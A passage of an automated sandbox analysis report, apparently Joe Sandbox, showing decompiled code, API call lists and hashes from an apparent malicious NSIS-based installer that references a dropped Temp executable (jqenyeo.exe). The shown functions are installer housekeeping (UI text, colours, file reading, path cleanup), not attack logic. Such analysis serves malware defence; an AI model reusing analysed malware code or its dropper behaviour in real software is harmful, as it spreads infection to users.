                                                          					if(_t38 == 0) {
                                                          						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                          					}
                                                          					_t27 = lstrlenW(0x422728);
                                                          					_a4 = _t27;
                                                          					if(_a8 == 0) {
                                                          						L6:
                                                          						if((_v12 & 0x00000004) == 0) {
                                                          							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                                          						}
                                                          						if((_v12 & 0x00000002) == 0) {
                                                          							_v32 = 0x422728;
                                                          							_v52 = 1;
                                                          							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                          							_v44 = 0;
                                                          							_v48 = _t29 - _t38;
                                                          							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                          							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                          						}
                                                          						if(_t38 != 0) {
                                                          							_t28 = _a4;
                                                          							0x422728[_t28] = 0;
                                                          							return _t28;
                                                          						}
                                                          					} else {
                                                          						_t27 = lstrlenW(_a8) + _a4;
                                                          						if(_t27 < 0x1000) {
                                                          							_t27 = lstrcatW(0x422728, _a8);
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t27;
                                                          			}

















                                                          0x004056d0
                                                          0x004056da
                                                          0x004056df
                                                          0x004056e5
                                                          0x004056f0
                                                          0x004056f3
                                                          0x004056f6
                                                          0x004056fc
                                                          0x004056fc
                                                          0x00405702
                                                          0x0040570a
                                                          0x0040570d
                                                          0x0040572a
                                                          0x0040572e
                                                          0x00405737
                                                          0x00405737
                                                          0x00405741
                                                          0x0040574a
                                                          0x00405756
                                                          0x0040575d
                                                          0x00405761
                                                          0x00405764
                                                          0x00405777
                                                          0x00405785
                                                          0x00405785
                                                          0x00405789
                                                          0x0040578b
                                                          0x0040578e
                                                          0x00000000
                                                          0x0040578e
                                                          0x0040570f
                                                          0x00405717
                                                          0x0040571f
                                                          0x00405725
                                                          0x00000000
                                                          0x00405725
                                                          0x0040571f
                                                          0x0040570d
                                                          0x0040579a

                                                          APIs
                                                          • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                          • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                          • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                          • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                            • Part of subcall function 004066A5: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                            • Part of subcall function 004066A5: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                          • String ID: ('B
                                                          • API String ID: 1495540970-2332581011
                                                          • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                          • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                          • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                          • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				long _t39;
                                                          				long _t41;
                                                          				void* _t44;
                                                          				signed char _t50;
                                                          				long* _t54;
                                                          
                                                          				if(_a4 + 0xfffffecd > 5) {
                                                          					L18:
                                                          					return 0;
                                                          				}
                                                          				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                          					goto L18;
                                                          				} else {
                                                          					_t50 = _t54[5];
                                                          					if((_t50 & 0xffffffe0) != 0) {
                                                          						goto L18;
                                                          					}
                                                          					_t39 =  *_t54;
                                                          					if((_t50 & 0x00000002) != 0) {
                                                          						_t39 = GetSysColor(_t39);
                                                          					}
                                                          					if((_t54[5] & 0x00000001) != 0) {
                                                          						SetTextColor(_a8, _t39);
                                                          					}
                                                          					SetBkMode(_a8, _t54[4]);
                                                          					_t41 = _t54[1];
                                                          					_v16.lbColor = _t41;
                                                          					if((_t54[5] & 0x00000008) != 0) {
                                                          						_t41 = GetSysColor(_t41);
                                                          						_v16.lbColor = _t41;
                                                          					}
                                                          					if((_t54[5] & 0x00000004) != 0) {
                                                          						SetBkColor(_a8, _t41);
                                                          					}
                                                          					if((_t54[5] & 0x00000010) != 0) {
                                                          						_v16.lbStyle = _t54[2];
                                                          						_t44 = _t54[3];
                                                          						if(_t44 != 0) {
                                                          							DeleteObject(_t44);
                                                          						}
                                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                                          					}
                                                          					return _t54[3];
                                                          				}
                                                          			}









                                                          0x0040463d
                                                          0x004046f3
                                                          0x00000000
                                                          0x004046f3
                                                          0x0040464e
                                                          0x00404652
                                                          0x00000000
                                                          0x0040466c
                                                          0x0040466c
                                                          0x00404675
                                                          0x00000000
                                                          0x00000000
                                                          0x00404677
                                                          0x00404683
                                                          0x00404686
                                                          0x00404686
                                                          0x0040468c
                                                          0x00404692
                                                          0x00404692
                                                          0x0040469e
                                                          0x004046a4
                                                          0x004046ab
                                                          0x004046ae
                                                          0x004046b1
                                                          0x004046b3
                                                          0x004046b3
                                                          0x004046bb
                                                          0x004046c1
                                                          0x004046c1
                                                          0x004046cb
                                                          0x004046d0
                                                          0x004046d3
                                                          0x004046d8
                                                          0x004046db
                                                          0x004046db
                                                          0x004046eb
                                                          0x004046eb
                                                          0x00000000
                                                          0x004046ee

                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                          • GetSysColor.USER32(00000000), ref: 00404686
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                          • SetBkMode.GDI32(?,?), ref: 0040469E
                                                          • GetSysColor.USER32(?), ref: 004046B1
                                                          • SetBkColor.GDI32(?,?), ref: 004046C1
                                                          • DeleteObject.GDI32(?), ref: 004046DB
                                                          • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                          • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                          • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                          				intOrPtr _t65;
                                                          				intOrPtr _t66;
                                                          				intOrPtr _t72;
                                                          				void* _t76;
                                                          				void* _t79;
                                                          
                                                          				_t72 = __edx;
                                                          				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                          				_t65 = 2;
                                                          				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                          				_t66 = E00402D84(_t65);
                                                          				_t79 = _t66 - 1;
                                                          				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                          				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                          				if(_t79 < 0) {
                                                          					L36:
                                                          					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                          				} else {
                                                          					__ecx = 0x3ff;
                                                          					if(__eax > 0x3ff) {
                                                          						 *(__ebp - 0x44) = 0x3ff;
                                                          					}
                                                          					if( *__edi == __bx) {
                                                          						L34:
                                                          						__ecx =  *(__ebp - 0xc);
                                                          						__eax =  *(__ebp - 8);
                                                          						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                          						if(_t79 == 0) {
                                                          							 *(_t76 - 4) = 1;
                                                          						}
                                                          						goto L36;
                                                          					} else {
                                                          						 *(__ebp - 0x38) = __ebx;
                                                          						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                          						if( *(__ebp - 0x44) > __ebx) {
                                                          							do {
                                                          								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                          									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                          										__eax = __ebp - 0x50;
                                                          										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                          											goto L34;
                                                          										} else {
                                                          											goto L21;
                                                          										}
                                                          									} else {
                                                          										goto L34;
                                                          									}
                                                          								} else {
                                                          									__eax = __ebp - 0x40;
                                                          									_push(__ebx);
                                                          									_push(__ebp - 0x40);
                                                          									__eax = 2;
                                                          									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                          									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                          									if(__eax == 0) {
                                                          										goto L34;
                                                          									} else {
                                                          										__ecx =  *(__ebp - 0x40);
                                                          										if(__ecx == __ebx) {
                                                          											goto L34;
                                                          										} else {
                                                          											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                          											 *(__ebp - 0x4c) = __ecx;
                                                          											 *(__ebp - 0x50) = __eax;
                                                          											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                          												L28:
                                                          												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                          											} else {
                                                          												__ebp - 0x50 = __ebp + 0xa;
                                                          												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                          													L21:
                                                          													__eax =  *(__ebp - 0x50);
                                                          												} else {
                                                          													__edi =  *(__ebp - 0x4c);
                                                          													__edi =  ~( *(__ebp - 0x4c));
                                                          													while(1) {
                                                          														_t22 = __ebp - 0x40;
                                                          														 *_t22 =  *(__ebp - 0x40) - 1;
                                                          														__eax = 0xfffd;
                                                          														 *(__ebp - 0x50) = 0xfffd;
                                                          														if( *_t22 == 0) {
                                                          															goto L22;
                                                          														}
                                                          														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                          														__edi = __edi + 1;
                                                          														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                          														__eax = __ebp + 0xa;
                                                          														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                          															continue;
                                                          														} else {
                                                          															goto L21;
                                                          														}
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          												L22:
                                                          												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                          													goto L28;
                                                          												} else {
                                                          													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                          														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                          															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                          															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                          														} else {
                                                          															__ecx =  *(__ebp - 0xc);
                                                          															__edx =  *(__ebp - 8);
                                                          															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                          															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                          														}
                                                          														goto L34;
                                                          													} else {
                                                          														__ecx =  *(__ebp - 0xc);
                                                          														__edx =  *(__ebp - 8);
                                                          														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                          														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                          														 *(__ebp - 0x38) = __eax;
                                                          														if(__ax == __bx) {
                                                          															goto L34;
                                                          														} else {
                                                          															goto L26;
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L37;
                                                          								L26:
                                                          								__eax =  *(__ebp - 8);
                                                          							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                          						}
                                                          						goto L34;
                                                          					}
                                                          				}
                                                          				L37:
                                                          				return 0;
                                                          			}








                                                          0x004026ec
                                                          0x004026ee
                                                          0x004026f1
                                                          0x004026f3
                                                          0x004026f6
                                                          0x004026fb
                                                          0x004026ff
                                                          0x00402702
                                                          0x00402705
                                                          0x00402c2a
                                                          0x00402c2d
                                                          0x0040270b
                                                          0x0040270b
                                                          0x00402712
                                                          0x00402714
                                                          0x00402714
                                                          0x0040271a
                                                          0x0040287e
                                                          0x0040287e
                                                          0x00402881
                                                          0x00402886
                                                          0x004015b6
                                                          0x0040292e
                                                          0x0040292e
                                                          0x00000000
                                                          0x00402720
                                                          0x00402721
                                                          0x0040272c
                                                          0x0040272f
                                                          0x0040273b
                                                          0x0040273f
                                                          0x004027d7
                                                          0x004027ef
                                                          0x004027ff
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402745
                                                          0x00402745
                                                          0x00402748
                                                          0x00402749
                                                          0x0040274c
                                                          0x00402751
                                                          0x00402758
                                                          0x00402760
                                                          0x00000000
                                                          0x00402766
                                                          0x00402766
                                                          0x0040276b
                                                          0x00000000
                                                          0x00402771
                                                          0x00402771
                                                          0x00402779
                                                          0x0040277c
                                                          0x0040277f
                                                          0x0040283a
                                                          0x00402841
                                                          0x00402785
                                                          0x0040278b
                                                          0x00402797
                                                          0x00402801
                                                          0x00402801
                                                          0x00402799
                                                          0x00402799
                                                          0x0040279c
                                                          0x0040279e
                                                          0x0040279e
                                                          0x0040279e
                                                          0x004027a1
                                                          0x004027a6
                                                          0x004027a9
                                                          0x00000000
                                                          0x00000000
                                                          0x004027ab
                                                          0x004027ae
                                                          0x004027bc
                                                          0x004027c2
                                                          0x004027d0
                                                          0x00000000
                                                          0x004027d2
                                                          0x00000000
                                                          0x004027d2
                                                          0x00000000
                                                          0x004027d0
                                                          0x0040279e
                                                          0x00402804
                                                          0x00402807
                                                          0x00000000
                                                          0x00402809
                                                          0x0040280e
                                                          0x0040284f
                                                          0x00402871
                                                          0x00402878
                                                          0x0040285d
                                                          0x0040285d
                                                          0x00402860
                                                          0x00402863
                                                          0x00402866
                                                          0x00402866
                                                          0x00000000
                                                          0x00402817
                                                          0x00402817
                                                          0x0040281a
                                                          0x0040281d
                                                          0x00402823
                                                          0x00402827
                                                          0x0040282a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040282a
                                                          0x0040280e
                                                          0x00402807
                                                          0x0040277f
                                                          0x0040276b
                                                          0x00402760
                                                          0x00000000
                                                          0x0040282c
                                                          0x0040282c
                                                          0x0040282f
                                                          0x00402838
                                                          0x00000000
                                                          0x0040272f
                                                          0x0040271a
                                                          0x00402c33
                                                          0x00402c39

                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                            • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                          • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                          • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                          • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E004068EF(WCHAR* _a4) {
                                                          				short _t5;
                                                          				short _t7;
                                                          				WCHAR* _t19;
                                                          				WCHAR* _t20;
                                                          				WCHAR* _t21;
                                                          
                                                          				_t20 = _a4;
                                                          				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                          					_t20 =  &(_t20[4]);
                                                          				}
                                                          				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                          					_t20 =  &(_t20[2]);
                                                          				}
                                                          				_t5 =  *_t20;
                                                          				_t21 = _t20;
                                                          				_t19 = _t20;
                                                          				if(_t5 != 0) {
                                                          					do {
                                                          						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                          							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                          							_t19 = CharNextW(_t19);
                                                          						}
                                                          						_t20 = CharNextW(_t20);
                                                          						_t5 =  *_t20;
                                                          					} while (_t5 != 0);
                                                          				}
                                                          				 *_t19 =  *_t19 & 0x00000000;
                                                          				while(1) {
                                                          					_push(_t19);
                                                          					_push(_t21);
                                                          					_t19 = CharPrevW();
                                                          					_t7 =  *_t19;
                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                          						break;
                                                          					}
                                                          					 *_t19 =  *_t19 & 0x00000000;
                                                          					if(_t21 < _t19) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t7;
                                                          			}








                                                          0x004068f1
                                                          0x004068fa
                                                          0x00406911
                                                          0x00406911
                                                          0x00406918
                                                          0x00406924
                                                          0x00406924
                                                          0x00406927
                                                          0x0040692a
                                                          0x0040692f
                                                          0x00406931
                                                          0x0040693a
                                                          0x0040693e
                                                          0x0040695b
                                                          0x00406963
                                                          0x00406963
                                                          0x00406968
                                                          0x0040696a
                                                          0x0040696d
                                                          0x00406972
                                                          0x00406973
                                                          0x00406977
                                                          0x00406977
                                                          0x00406978
                                                          0x0040697f
                                                          0x00406981
                                                          0x00406988
                                                          0x00000000
                                                          0x00000000
                                                          0x00406990
                                                          0x00406996
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406996
                                                          0x0040699b

                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                          • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                          • CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                          • CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-2982765560
                                                          • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                          • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                          • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                          • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040302E(intOrPtr _a4) {
                                                          				short _v132;
                                                          				long _t6;
                                                          				struct HWND__* _t7;
                                                          				struct HWND__* _t15;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_t15 =  *0x420efc;
                                                          					if(_t15 != 0) {
                                                          						_t15 = DestroyWindow(_t15);
                                                          					}
                                                          					 *0x420efc = 0;
                                                          					return _t15;
                                                          				}
                                                          				if( *0x420efc != 0) {
                                                          					return E00406A71(0);
                                                          				}
                                                          				_t6 = GetTickCount();
                                                          				if(_t6 >  *0x42a26c) {
                                                          					if( *0x42a268 == 0) {
                                                          						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                          						 *0x420efc = _t7;
                                                          						return ShowWindow(_t7, 5);
                                                          					}
                                                          					if(( *0x42a314 & 0x00000001) != 0) {
                                                          						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                          						return E004056CA(0,  &_v132);
                                                          					}
                                                          				}
                                                          				return _t6;
                                                          			}







                                                          0x0040303d
                                                          0x0040303f
                                                          0x00403046
                                                          0x00403049
                                                          0x00403049
                                                          0x0040304f
                                                          0x00000000
                                                          0x0040304f
                                                          0x0040305d
                                                          0x00000000
                                                          0x00403060
                                                          0x00403067
                                                          0x00403073
                                                          0x0040307b
                                                          0x004030b9
                                                          0x004030c2
                                                          0x00000000
                                                          0x004030c7
                                                          0x00403084
                                                          0x00403095
                                                          0x00000000
                                                          0x004030a3
                                                          0x00403084
                                                          0x004030cf

                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                          • GetTickCount.KERNEL32 ref: 00403067
                                                          • wsprintfW.USER32 ref: 00403095
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                          • CreateDialogParamW.USER32 ref: 004030B9
                                                          • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                            • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
